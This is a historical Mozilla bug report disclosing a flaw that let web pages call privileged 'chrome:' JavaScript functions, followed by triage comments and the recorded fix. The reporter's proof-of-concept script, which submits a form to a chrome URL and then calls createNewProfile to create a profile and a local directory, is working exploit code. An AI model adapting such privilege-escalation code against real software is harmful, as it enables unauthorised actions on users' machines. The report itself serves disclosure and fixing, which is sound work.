Closed
Bug 21144
Opened 25 years ago
Closed 25 years ago
[DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M12
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT-]reviewed fix in hand)
There is a vulnerability, which allows executing JavaScript functions in the "chrome:" protocol. This is dangerous because such functions have much more priviligies than JavaScript functions loaded from a web page. If one opens a "chrome:" url in a window, he have access to all functions in the window and the functions are executed by "windowname.functionname()" in the "chrome:" protocol. Some of the predefined functions in the Mozilla chrome may do dangerous things. This demonstration creates a profile named "georgi" and creates the directory "c:\georgi". The code is: ------------------------------------------------------------------------- <SCRIPT> b=window.open("","victim"); function g() { b.profile.createNewProfile("georgi","c:\\georgi\\"); } setTimeout("document.forms[0].submit()",1000); setTimeout("g()",4000); </SCRIPT> <FORM ACTION="chrome://profile/content/createProfileWizard.xul" TARGET="victim" METHOD="POST"> </FORM> -------------------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Summary: Executing JS functions in "chrome:" protocol (creating local directories and profiles) → [DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)
Assignee | ||
Comment 1•25 years ago
|
||
Marking dogfood for PDT consideration.
Assignee | ||
Comment 2•25 years ago
|
||
Jim Roskind asked:
>Can you make some comments about this bug? Can the content arrive from
>outside, or is it restricted to stuff on the local
>disk? Is there any obvious attackable script sitting locally?
This bug allows access to all functions defined in chrome. This is the
equivalent of a Java applet being able to call all methods of all classes in the
system. We haven't reviewed the whole of the JavaScript defined in chrome since
the model is to prevent access to all of it, but I would be very suprised if
there weren't many opportunities for exploitation.
Assignee | ||
Updated•25 years ago
|
Whiteboard: reviewed fix in hand
Whiteboard: reviewed fix in hand → [PDT-]reviewed fix in hand
Target Milestone: M12
Putting on PDT- radar. But it good for M12...please see chofmann for approval to check in.
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 4•25 years ago
|
||
Fixed: Checking in nsFormFrame.cpp; /m/pub/mozilla/layout/html/forms/src/nsFormFrame.cpp,v <-- nsFormFrame.cpp new revision: 3.86; previous revision: 3.85 done
Updated•25 years ago
|
Status: RESOLVED → VERIFIED
Comment 5•25 years ago
|
||
Verified fixed.
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•